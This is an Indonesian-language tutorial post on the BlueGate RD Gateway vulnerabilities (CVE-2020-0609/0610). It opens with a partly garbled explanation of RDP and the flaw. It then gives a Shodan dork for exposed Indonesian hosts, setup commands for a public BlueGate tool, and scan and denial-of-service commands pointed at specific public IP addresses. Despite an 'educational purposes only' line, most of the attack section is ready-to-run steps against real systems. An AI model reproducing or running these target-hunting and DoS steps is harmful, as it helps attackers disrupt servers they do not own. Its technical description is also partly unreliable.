CVE-2020-0609 & CVE-2020-0610
Kedua kerentanan ini memungkinkan Anda untuk mengeksekusi kode dari jarak jauh dalam layanan Windows Remote Control Gateway (RD Gateway), jenis serangan ini memungkinkan peretas untuk terhubung ke server RDP tanpa otentikasi dengan mengirimkan kode jarak jauh ke sistem operasi (0x00 - 0xFFFF)
Data yang akan ditulis juga sewenang-wenang dengan panjang hingga 1000 byte pada suatu waktu dan maksimum 4.096 selama sesi.
RD Gateway Berfungsi sebagai proksi RDP antara beberapa server jaringan internal.
Layanan UDP ini dapat diidentifikasi dengan N. 3391 secara default.
Vuln Vesion
- Windows Server 2012
- Windows Server 2012 R2
- Windows Server 2016
- Windows Server 2019
Pengertian RDP
RDP merupakan singkatan dari Remote Desktop Protocol merupakan fitur dalam sistem operasi Microsoft Windows seperti XP, windows Server 2003, windows Server 2008, windows server 2012, Vista. Dimana fungsi fasilitas ini memberikan izin kepada pengguna agar mudah terkoneksi pada sebuah mesin jarak jauh ibarat kata, user dapat mengakses beberapa mesin dalam satu mesin tanpa harus berpindah tempat duduk.
Secara default, Remote Desktop Protocol berjalan melalui TCP port 3389. Remote Desktop Protocol (RDP) dibuat dengan berdasarkan protokol T.120 yang merupakan protokol dalam perangkat lunak yang berjarak jauh. Adpaaun sistem operasi yang mendukung pada fasilitas RDP ini yaitu Windows 32-bit ( Windows CE dan PocketPC), Linux, Apple Mac OS X, FreeBSD, UNIX Solaris.
for educational purposes only
Mencari Bug CVE-2020-0609 & CVE-2020-0610
1.Login Ke Shodan Dengan Pro Account
2.Dorking
port:3391 country:"ID"3.Target yang rentan memiliki respond seperti berikut
Attacking Dan Scanning
Installasi
sudo -s
apt-get update
apt-get -y upgrade
apt-get install -y python3-pip
pip3 install pyOpenSSL
pip3 install cryptography
https://github.com/ollypwn/BlueGate
Scanning
python3 BlueGate.py -M check -P 3391 110.35.81.137Attacking
python3 BlueGate.py -M dos -P 3391 202.169.44.125
Mungkin itu saja untuk artikel kali ini, jika ada yang kurang dipahami atau ingin bertanya silahkan menghubungi kami via fanspage.
Terimakasih dan semoga bermanfaat :)